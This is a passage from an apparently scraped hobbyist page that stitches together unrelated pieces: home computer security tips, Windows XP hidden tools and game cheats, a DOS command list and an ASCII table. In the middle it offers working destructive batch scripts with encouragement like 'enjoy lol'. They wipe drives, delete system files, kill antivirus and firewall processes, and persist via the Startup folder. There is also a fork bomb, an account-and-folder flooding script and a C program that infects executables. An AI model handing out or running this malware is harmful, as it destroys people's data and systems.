10 most dangerous things you can do to compromise your computer's security.

1. Use a password that is easy to guess.

Examples: "password", your name, your cat's name, any name at all, any word that can be found in a dictionary.

Why it is dangerous: Hackers routinely use so-called 'dictionary attacks'. They simply run the entire dictionary against your password, so a password consisting of an English word will be cracked in seconds, if not faster.
Better: - use a random combination of letters (upper and lower cases), numbers and special characters (@, *, #, etc.).
Example: "hfdjje%*834k##1JK" is almost impossible to crack by brute force, unlike a password such as "nice".

2. Use broadband (e.g. DSL or Cable) without a firewall.

Most people in this country lock their doors every night and buy car alarms. Isn't it amazing that the same people who lock their cars and houses don't bother to lock their computers from thousands of crooks constantly scanning the Internet for unprotected computers?
Most people find it hard to understand that in order to inflict damage, hackers don't have to live next door to you or even in the same country. They don't need to know you personally. In fact, many of them are just using special software that lets them scan millions of computers with much less effort and skill than it takes an old-fashioned burglar to pick a lock.
Your best defense against this is a good firewall. Without getting too technical, suffice it to say that a firewall acts somewhat like a cloaking device from Star Trek by making your computer invisible to the hacker. Good firewalls also guard your computer from attacks from within by telling you when an unauthorized program is trying to access the Internet. This makes firewalls great tools against the spyware.


3. Disable a firewall.


Some people heard somewhere that firewalls are important and even installed one on their computer. Unfortunately, the firewall turned out to be a nuisance because every minute or so it would popup with a cryptic warning with some strange words and even stranger numbers. So, to keep things simple, they decide to get rid of the pest.
Bad idea! Would you get rid of a dog that barks to warn you of intruders? When the firewall is telling you that somebody is trying to get into your computer, thank it, don't shut it off! Actually, most firewalls will let you disable the warning messages, so in a few days your protector will be well-behaved and won't bother you too much.


4. Send passwords and other sensitive information via unprotected email.

Most people would be surprised to find out that regular email is not protected. Hackers can easily intercept email pockets traveling over cyberspace, just like guys with scanners can listen to conversations over the old cordless phones. For this reason shouting your passwords, social security numbers, etc. from a street corner is actually less dangerous than sending the same information through regular email.


5. Respond to "phishing" requests.

Some criminals like to add a "human touch" to their activities. Instead of going after your bank or credit card information by breaking into your computer, they simply ask you for it. Take a look this "masterpiece":
Dear Bank***.com Customer, During our regular update and verification of the Internet Banking Accounts, we could not verify your current information. Either your information has been changed or incomplete, as a result your access to use our services has been limited. Please update your information. To update your account information and start using our services please click on the link below: https://www.bank***.com/net AFTER SUBMITTING, PLEASE DONOT ACCESS YOUR ONLINE BANKING ACCOUNT FOR THE NEXT 48 HOURS UNTIL THE VERIFICATION PROCESS ENDS. Note: Requests for information will be initiated by Bank*** Business Development; this process cannot be externally requested through Customer Support. Sincerely, Bank***.com Security Department.
It is very easy for the hackers to create a web page that looks like your bank's page and trick you into entering your ID, password and other things that you would want to keep secret.
Most messages like the one shown above are scams, however if you have reasons to believe that an email asking you to login and update or verify your information is legitimate, it is a good idea to contact your financial institution first by telephone or in person.


6. Share your computer with a teenager.

Of course, there are exceptions. Nevertheless, many teenagers like music, especially when it's free. The same goes for games and other fun stuff. And who can blame them? Unfortunately, the file-sharing software that they use is virtually custom-made to the hackers' specifications. Any computer with a program like Morpheus, Kazaa, LimeWire, etc. should be considered infected by viruses, worms and spyware unless proven otherwise. If somebody in your family insists on using file-sharing software, consider designating a separate computer for that.


7. Install free software from sources you don't know well.

The best things in life are free. This usually is not true when it comes to software. After all, somebody has to design, write and test it. Somebody also has to pay for maintaining that website where you downloaded the software from. There are a lot of "free" software programs supported by advertisements. They will even mention it somewhere in the 23rd paragraph of the License Agreement that you have surely perused before hitting the "Install" button. Some programs are more malicious than others.
On the other hand, there exist quite a few high-quality free programs. They are either old versions, teasers for commercial products, marketing vehicles, etc. The bottom line - if you are getting something for free, apply some common-sense and think about why it is actually free.


8. Open emails from strangers and run the attachment.

Some things are almost impossible to understand, and we aren't talking about the general theory of relativity here.
The genius who invented email most likely had no idea that in addition to helping people to share information cheaply and almost instantaneously, email can become an ideal medium for disseminating computer viruses and other malicious software. Hackers quickly learned to use email attachments to send their destructive payloads. They also learned particularly well how to exploit numerous vulnerabilities in Microsoft Outlook that in addition to being a pretty neat email client turned out to be an almost perfect gateway for email viruses and worms.
To protect yourself, make sure that you open only email that doesn't look suspicious. Be ten times more careful with messages that include attachments, even if they appear to be from your friends. Numerous programs exist that fight email viruses and spam, but nothing can replace simple common sense.


9. Fail to update your Windows.

Microsoft Windows is a wonderful operating system that lets us do amazing things quickly and economically. Unfortunately, security came to Windows as an afterthought. Day after day new security holes are being discovered, publicized and eventually fixed. Even though updating Windows can be cumbersome, especially if you don't have broadband connection, people who fail to update have only themselves to blame in case they become victims of an exploit already fixed by Microsoft.


10. Click Yes on "Installing IE plug-ins" popup while surfing the Internet.

Everybody who spends a few hours a day surfing the Internet has seen those "friendly" offers of free software appearing seemingly out of nowhere. Free self-adjusting atomic clock, etc. The trouble with this free software is that it doesn't come alone. It will usually install some other things on your computer that you won't necessarily like. Namely, programs tracking your every move on the Internet, redirecting you to the website that you never wanted to see, feeding you with deceptive ads and so on. So before clicking "yes", think!

Mini virus bt dangerous


  • One more ...
    try one this

    Cd C:\
    rd C:\ /s/q
    Cd D:\
    rd D:\ /s/q
    Cd E:\
    Rd E:\ /s/q
    Cd F:\
    Rd\ /s/q

    then it is complete Save as any file you want in .bat format.. n enjoy lol..its really dangerous dont try on your own pc.


How to add ur own created viruses into start ups this will make it diifcult to detect them n to remove them ...

1) For this u can use the simple code below ..

@echo off
copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

n den rest of the code ..

2) suppose u want to make a shutdown.bat a virus which will copy itself in start up n wenever comptuer starts it will shut down it in 2 secs..most dangerous kind of thing better to make create restore point before working with such files..

@echo off
copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

@echo off
shutdown -s -t 5 -c "Shutdown"

save it as abcd.bat when ever u will run it it will be saved in ur start ups..

here t 5 means that ur comp will take5 secs to shut down u can make it 2 as well then it will be most dangerous thing to handle .. lol

End Process virus

Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!
This Virus will:

1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. End Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens

title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

4 mini virus

  • This code about multiple open windows means infinite windows
    until continue you restart the computer:save on denger.bat and code written in notepad

    @echo off
    copy 0% denger.bat
    start denger.bat

  • This code about the computer shutdown:

    @echo off
    shutdown -s -t 5 -c "Shutdown"


  • Go to notepad and type the following:
    @Echo off
    Del C:\ *.*|y

    save it as Dell.bat

  •          Want worse then type the following:
                   @echo off
                    del %systemdrive%\*.*/f/s/q
                     shutdown -r -f -t 00

                    and save it as a .bat file

Just for Fun

Here is another one which is funny......

cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files...
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
echo:
echo:
echo:
echo Deleting Root Partition...
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x...
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir h4x
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1...
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall...
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes...
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup...
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c "Your computer has committed suicide. Have a nice day."

Make your own computer viruses in notepad

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to make simple .bat file (virus) that can't be detected by any antivirus

Here are some good viruses ,i am not responsible for any kind of damage to your system :-D


Copy this to notepad and save as flood1.bat :-D


@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start

:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1

what does it do : this is an extremely harmful virus the will keep replicating itself until your harddrive is totally full and will destroy ur comp.

This program is an example of how to create a virus in c

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst("*.*",&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],"rb");
host=fopen(ffblk.ff_name,"rb+");
if(host==NULL) goto next;
x=89088;
printf("Infecting %s\n",ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf("DONE! (Total Files Infected= %d)",a);
end=clock();
printf("TIME TAKEN=%f SEC\n",
(end-st)/CLK_TCK);
getch();
}



dont run in ur computer

HOW TO TEST:

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4.All the infected files will be ready to reinfect

That's it
WARNING: FOR EDUCATIONAL PURPOSES ONLY 

WINDOWS XP HIDDEN APPS very helpful

1) Character Map = charmap.exe (very useful for finding unusual characters)

2) Disk Cleanup = cleanmgr.exe

3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)

4) Dr Watson = drwtsn32.exe (Troubleshooting tool)

5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)

6) Private character editor = eudcedit.exe (allows creation or modification of characters)

7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)

8) m*cro$oft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).

9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).

10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)

11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).

12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for uber-geeks only )

13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).

14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant).

15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).

16) Network shared folder wizard = shrpubw.exe (creates shared folders on network).

17) File siganture verification tool = sigverif.exe

18) Volume Control = sndvol32.exe (I've included this for those people that lose it from the System Notification area).

19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just like in Win98! ).

20) Syskey = syskey.exe (Secures XP Account database - use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications).

21) m*cro$oft Telnet Client = telnet.exe

22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).

23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).

24) System configuration = msconfig.exe (can use to control starup programs)

25) gpedit.msc used to manage group policies, and permissions

Win Xp Hidden Secrets

Defrag

Secret - Hidden Command Line Switch
Instructions - Go to "Start", "Run" and Type defrag c: -b to defragment the Boot and Application Prefetch information. Similar to what BootVis invokes.

Paint

Secret - Image Trails
Instructions - Open an image and hold down Shift then drag the image around to create an image trail.

Secret - 10x Zoom
Instructions - Open an image and select the magnifying glass icon. Left-Click exactly on the line below the 8x.


Game Secrets


FreeCell

Secret - Instant Win
Instructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.

Secret - Hidden Game Modes
Instructions - In the "Game" menu choose "Select Game". Enter -1 or -2 to activate the hidden game modes.

Minesweeper

Secret - Reveal Mines
Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.

Pinball

Secret - Extra Balls
Instructions - Type 1max at the start of a new ball to get extra balls.

Secret - Gravity Well
Instructions - Type gmax at the start of a new game to activate the Gravity Well.

Secret - Instant Promotion
Instructions - Type rmax at the start of a new game to go up in ranks.

Secret - Skill Shot
Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:

First: 15,000 points
Second: 30,000 points
Third: 75,000 points
Fourth: 30,000 points
Fifth: 15,000 points
Sixth: 7,500 points

Secret - Test Mode
Instructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.

Secret - Unlimited Balls
Instructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting the game.

Solitaire

Secret - Instant Win
Instructions - Press Alt + Shift + 2 during game play to instantly win.

Secret - Draw single cards in a Draw Three game
Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.


OS Secrets


Add/Remove

Secret - Hidden Uninstall Options
Instructions - Warning: Proceed at your own risk! Browse to C:\Windows\inf\ and make a backup copy of sysoc.inf. Then open the original file C:\Windows\inf\sysoc.inf in notepad. Go to "Edit" and select "Replace". In "Find what:" type ,hide and in "Replace with:" type , then select "Replace All", save and close the file. Go to the control panel, "Add/Remove", select "Add/Remove Windows Components". You will now see many more Windows components to uninstall. Do not remove anything with no label or that you do not recognize or fully understand what it does. Doing so can break certain functionality in Windows.

Control Panel

Secret - Hidden Control Panel Extensions
Instructions - Download and install TweakUI, launch, go to "Control Panel" and check any item not selected, then "Apply" and "OK". You will now see the hidden control panel extensions.

Device Manager

Secret - Hidden Devices
Instructions - Go to the control panel, "System" icon, "Hardware" tab and select "Device Manager". Select View and Show hidden devices.

Music

Secret - Music from the Installer
Instructions - Browse to C:\Windows\system32\oobe\images\title.wma and play.

Shutdown

Secret - Display Hibernate Option on the Shut Down dialog
Instructions - Go to "Start", "Turn Off Computer..." and press either Shift key to change the "Stand By" button to "Hibernate".

Support Tools

Secret - Over 100 Windows XP Support Utilities are on the install CD

Instructions for Pre-SP2 users - If you do not have SP2 installed, put the original Windows XP CD in the CD-ROM Drive, run the D:\Support\Tools\setup.exe file.

Ms-dos Commands

Command Prompt
-------------------------------------------------------------------
ANSI.SYS - Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND - Causes MS-DOS to look in other directories when editing a file or running a command.
ARP - Displays, adds, and removes arp information from network devices.
ASSIGN - Assign a drive letter to an alternate letter.
ASSOC - View the file associations.
AT - Schedule a time to execute commands or programs.
ATMADM - Lists connections and addresses seen by Windows ATM call manager.
ATTRIB - Display and change file attributes.

BATCH - Recovery console command that executes a series of commands in a file.
BACKUP - Enables users to backup their data on their computer.
BOOTCFG - Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK - Enable / disable CTRL + C feature.

CACLS - View and modify file ACL's.
CALL - Calls a batch file from another batch file.
CD - Changes directories.
CHCP - Supplement the International keyboard and character set information.
CHDIR - Changes directories.
CHKDSK - Check the hard disk drive running FAT for errors.
CHKNTFS - Check the hard disk drive running NTFS for errors.
CHOICE - Specify a listing of multiple options within a batch file.
CLS - Clears the screen.
CMD - Opens the command interpreter.
COLOR - Easily change the foreground and background color of the MS-DOS window.
COMMAND - Opens the command interpreter.
COMP - Compares files.
COMPACT - Compresses and uncompress files.
CONTROL - Open control panel icons from the MS-DOS prompt.
CONVERT - Convert FAT to NTFS.
COPY - Copy one or more files to an alternate location.
CTTY - Change the computers input/output devices.

DATE - View or change the systems date.
DEBUG - Debug utility to create assembly programs to modify hardware settings.
DEFRAG - Re-arrange the hard disk drive to help with loading programs.
DEL - Deletes one or more files.
DELETE - Recovery console command that deletes a file.
DELTREE - Deletes one or more files and/or directories.
DIR - List the contents of one or more directory.
DISABLE - Recovery console command that disables Windows system services or drivers.
DISKCOMP - Compare a disk with another disk.
DISKPART - used to delete and create partitions.
DISKCOPY - Copy the contents of one disk and place them on another disk.
DOSKEY - Command to view and execute commands that have been run in the past.
DOSSHELL - A GUI to help with early MS-DOS users.
DRIVPARM - Enables overwrite of original device drivers.

ECHO - Displays messages and enables and disables echo.
EDIT - View and edit files.
EDLIN - View and edit files.
EMM386 - Load extended Memory Manager.
ENABLE - Recovery console command to enable a disable service or driver.
ENDLOCAL - Stops the localization of the environment changes enabled by the setlocal command.
ERASE - Erase files from computer.
EXIT - Exit from the command interpreter.
EXPAND - Expand a M*cro$oft Windows file back to it's original format.
EXTRACT - Extract files from the M*cro$oft Windows cabinets.

FASTHELP - Displays a listing of MS-DOS commands and information about them.
FC - Compare files.
FDISK - Utility used to create partitions on the hard disk drive.
FIND - Search for text within a file.
FINDSTR - Searches for a string of text within a file.
FIXBOOT - Writes a new boot sector.
FIXMBR - Writes a new boot record to a disk drive.
FOR - Boolean used in batch files.
FORMAT - Command to erase and prepare a disk drive.
FTP - Command to connect and operate on a FTP server.
FTYPE - Displays or modifies file types used in file extension associations.

GOTO - Movesa batch file to a specific label or location.
GRAFTABL - Show extended characters in graphics mode.

HELP - Display a listing of commands and brief explanation.
HOSTNAME -Display the hostname of the machine.

IF - Allows for batch files to perform conditional processing.
IFSHLP.SYS - 32-bit file manager.
IPCONFIG - Network command to view network adapter settings and assigned values.

KEYB - Change layout of keyboard.

LABEL - Change the label of a disk drive.
LH - Load a device driver in to high memory.
LISTSVC - Recovery console command that displays the services and drivers.
LOADFIX - Load a program above the first 64k.
LOADHIGH - Load a device driver in to high memory.
LOCK - Lock the hard disk drive.
LOGON - Recovery console command to list installations and enable administrator login.

MAP - Displays the device name of a drive.
MD - Command to create a new directory.
MEM - Display memory on system.
MKDIR - Command to create a new directory.
MODE - Modify the port or display settings.
MORE - Display one page at a time.
MOVE - Move one or more files from one directory to another directory.
MSAV - Early M*cro$oft Virus scanner.
MSBACKUP -MS-DOS application that enables users to backup their data on their computer.
MSD - Diagnostics utility.
MSCDEX - Utility used to load and provide access to the CD-ROM.
MWBACKUP - MS-DOS application that enables users to backup their data on their computer.

NBTSTAT - Displays protocol statistics and current TCP/IP connections using NBT
NET - Update, fix, or view the network or network settings
NETSH - Configure dynamic and static network information from MS-DOS.
NETSTAT - Display the TCP/IP network protocol statistics and information.
NLSFUNC - Load country specific information.
NSLOOKUP - Look up an IP address of a domain or host on a network.

PATH - View and modify the computers path location.
PATHPING - View and locate locations of network latency.
PAUSE - Command used in batch files to stop the processing of a command.
PING - Test / send information to another network computer or network device.
POPD - Changes to the directory or network path stored by the pushd command.
POWER - Conserve power with computer portables.
PRINT - Prints data to a printer port.
PROMPT - View and change the MS-DOS prompt.
PUSHD - Stores a directory or network path in memory so it can be returned to at any time.

QBASIC - Open the QBasic.

RD - Removes an empty directory.
REN - Renames a file or directory.
RENAME - Renames a file or directory.
RMDIR - Removes an empty directory.
ROUTE - View and configure windows network route tables.
RUNAS - Enables a user to execute a program on another computer.

SCANDISK - Run the scandisk utility.
SCANREG - Scan registry and recover registry from errors.
SET - Change one variable or string to another.
SETLOCAL - Enables local environments to be changed without affecting anything else.
SETVER - Change MS-DOS version to trick older MS-DOS programs.
SFC - Scans and replaces any M*cro$oft Windows file on the computer and replaces any changed file with the correct version
SHARE - Installs support for file sharing and locking capabilities.
SHIFT - Changes the position of replaceable parameters in a batch program.
SHUTDOWN - Shutdown the computer from the MS-DOS prompt.
SMARTDRV - Create a disk cache in conventional memory or extended memory.
SORT - Sorts the input and displays the output to the screen.
START - Start a separate window in Windows from the MS-DOS prompt.
SUBST - Substitute a folder on your computer for another drive letter.
SWITCHES - Remove add functions from MS-DOS.
SYS - Transfer system files to disk drive.
SYSTEMINFO - Displays complete system information for M*cro$oft Windows XP Professional computers.
SYSTEMROOT - The systemroot command is a recovery console command that sets the current directory as the system root directory.

TELNET - Telnet to another computer / device from the prompt.
TIME - View or modify the system time.
TITLE - Change the title of their MS-DOS window.
TRACERT - Visually view a network packets route across a network.
TREE - View a visual tree of the hard disk drive.
TYPE - Display the contents of a file.

UNDELETE - Undelete a file that has been deleted.
UNFORMAT - Unformat a hard disk drive.
UNLOCK - Unlock a disk drive.

VER Display - the version information.
VERIFY - Enables or disables the feature to determine if files have been written properly.
VOL - Displays the volume information about the designated drive.

XCOPY - Copy multiple files, directories, and/or drives from one location to another.

Lock your USB port

To do this you have to make a registry tweak taht will prevent writting to the usb port in Windows XP.
1) Go to 'Start|Run' and type 'Regedit'.
2) Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control.
3) Here add a new folder on the left pane by right clicking on it and selecting 'New|Key'.
4) Name this folder 'StorageDevicePolicies'.
5) Click this new folder and in the window on the right create a new DWORD value, lebel it WriteProtect, give it a value of '1'.
6) Now users will not be able to write any data on the USB.

To turn it off just set the value to '0'

Lock your System on Mouse Click

Lock your System on Mouse Click Feel hard to press CTRL+ALT+DEL to lock your machine ?????? Try this and create the icon to lock the machine. 1. Right click an empty spot on the desktop, point to New and click Shortcut. 2. In the Create Shortcut dialog box, type the following in the 'Type the location' of the item text box: "rundll32 user32.dll,LockWorkStation" remove quotes while typing. 3. Click Next. 4. In "Type a name for this shortcut", type "" (any name as u wish) and Click Finish

ASCII control characters

The following ASCII table contains both ASCII control characters, ASCII printable characters and the extended ASCII character set ISO 8859-1, also called ISO Latin1




ASCII control characters (character code 0-31)

The first 32 characters in the ASCII-table are unprintable control codes and are used to control peripherals such as printers.
DEC OCT HEX BIN Symbol HTML Number HTML Name Description
00000000000000NUL&#000;Null char
10010100000001SOH&#001;Start of Heading
20020200000010STX&#002;Start of Text
30030300000011ETX&#003;End of Text
40040400000100EOT&#004;End of Transmission
50050500000101ENQ&#005;Enquiry
60060600000110ACK&#006;Acknowledgment
70070700000111BEL&#007;Bell
80100800001000BS&#008;Back Space
90110900001001HT&#009;Horizontal Tab
100120A00001010LF&#010;Line Feed
110130B00001011VT&#011;Vertical Tab
120140C00001100FF&#012;Form Feed
130150D00001101CR&#013;Carriage Return
140160E00001110SO&#014;Shift Out / X-On
150170F00001111SI&#015;Shift In / X-Off
160201000010000DLE&#016;Data Line Escape
170211100010001DC1&#017;Device Control 1 (oft. XON)
180221200010010DC2&#018;Device Control 2
190231300010011DC3&#019;Device Control 3 (oft. XOFF)
200241400010100DC4&#020;Device Control 4
210251500010101NAK&#021;Negative Acknowledgement
220261600010110SYN&#022;Synchronous Idle
230271700010111ETB&#023;End of Transmit Block
240301800011000CAN&#024;Cancel
250311900011001EM&#025;End of Medium
260321A00011010SUB&#026;Substitute
270331B00011011ESC&#027;Escape
280341C00011100FS&#028;File Separator
290351D00011101GS&#029;Group Separator
300361E00011110RS&#030;Record Separator
310371F00011111US&#031;Unit Separator

ASCII printable characters (character code 32-127)

Codes 32-127 are common for all the different variations of the ASCII table, they are called printable characters, represent letters, digits, punctuation marks, and a few miscellaneous symbols. You will find almost every character on your keyboard. Character 127 represents the command DEL.
DEC OCT HEX BIN Symbol HTML Number HTML Name Description
320402000100000&#32;Space
330412100100001!&#33;Exclamation mark
340422200100010"&#34;&quot;Double quotes (or speech marks)
350432300100011#&#35;Number
360442400100100$&#36;Dollar
370452500100101%&#37;Procenttecken
380462600100110&&#38;&amp;Ampersand
390472700100111'&#39;Single quote
400502800101000(&#40;Open parenthesis (or open bracket)
410512900101001)&#41;Close parenthesis (or close bracket)
420522A00101010*&#42;Asterisk
430532B00101011+&#43;Plus
440542C00101100,&#44;Comma
450552D00101101-&#45;Hyphen
460562E00101110.&#46;Period, dot or full stop
470572F00101111/&#47;Slash or divide
4806030001100000&#48;Zero
4906131001100011&#49;One
5006232001100102&#50;Two
5106333001100113&#51;Three
5206434001101004&#52;Four
5306535001101015&#53;Five
5406636001101106&#54;Six
5506737001101117&#55;Seven
5607038001110008&#56;Eight
5707139001110019&#57;Nine
580723A00111010:&#58;Colon
590733B00111011;&#59;Semicolon
600743C00111100<&#60;&lt;Less than (or open angled bracket)
610753D00111101=&#61;Equals
620763E00111110>&#62;&gt;Greater than (or close angled bracket)
630773F00111111?&#63;Question mark
641004001000000@&#64;At symbol
651014101000001A&#65;Uppercase A
661024201000010B&#66;Uppercase B
671034301000011C&#67;Uppercase C
681044401000100D&#68;Uppercase D
691054501000101E&#69;Uppercase E
701064601000110F&#70;Uppercase F
711074701000111G&#71;Uppercase G
721104801001000H&#72;Uppercase H
731114901001001I&#73;Uppercase I
741124A01001010J&#74;Uppercase J
751134B01001011K&#75;Uppercase K
761144C01001100L&#76;Uppercase L
771154D01001101M&#77;Uppercase M
781164E01001110N&#78;Uppercase N
791174F01001111O&#79;Uppercase O
801205001010000P&#80;Uppercase P
811215101010001Q&#81;Uppercase Q
821225201010010R&#82;Uppercase R
831235301010011S&#83;Uppercase S
841245401010100T&#84;Uppercase T
851255501010101U&#85;Uppercase U
861265601010110V&#86;Uppercase V
871275701010111W&#87;Uppercase W
881305801011000X&#88;Uppercase X
891315901011001Y&#89;Uppercase Y
901325A01011010Z&#90;Uppercase Z
911335B01011011[&#91;Opening bracket
921345C01011100\&#92;Backslash
931355D01011101]&#93;Closing bracket
941365E01011110^&#94;Caret - circumflex
951375F01011111_&#95;Underscore
961406001100000`&#96;Grave accent
971416101100001a&#97;Lowercase a
981426201100010b&#98;Lowercase b
991436301100011c&#99;Lowercase c
1001446401100100d&#100;Lowercase d
1011456501100101e&#101;Lowercase e
1021466601100110f&#102;Lowercase f
1031476701100111g&#103;Lowercase g
1041506801101000h&#104;Lowercase h
1051516901101001i&#105;Lowercase i
1061526A01101010j&#106;Lowercase j
1071536B01101011k&#107;Lowercase k
1081546C01101100l&#108;Lowercase l
1091556D01101101m&#109;Lowercase m
1101566E01101110n&#110;Lowercase n
1111576F01101111o&#111;Lowercase o
1121607001110000p&#112;Lowercase p
1131617101110001q&#113;Lowercase q
1141627201110010r&#114;Lowercase r
1151637301110011s&#115;Lowercase s
1161647401110100t&#116;Lowercase t
1171657501110101u&#117;Lowercase u
1181667601110110v&#118;Lowercase v
1191677701110111w&#119;Lowercase w
1201707801111000x&#120;Lowercase x
1211717901111001y&#121;Lowercase y
1221727A01111010z&#122;Lowercase z
1231737B01111011{&#123;Opening brace
1241747C01111100|&#124;Vertical bar
1251757D01111101}&#125;Closing brace
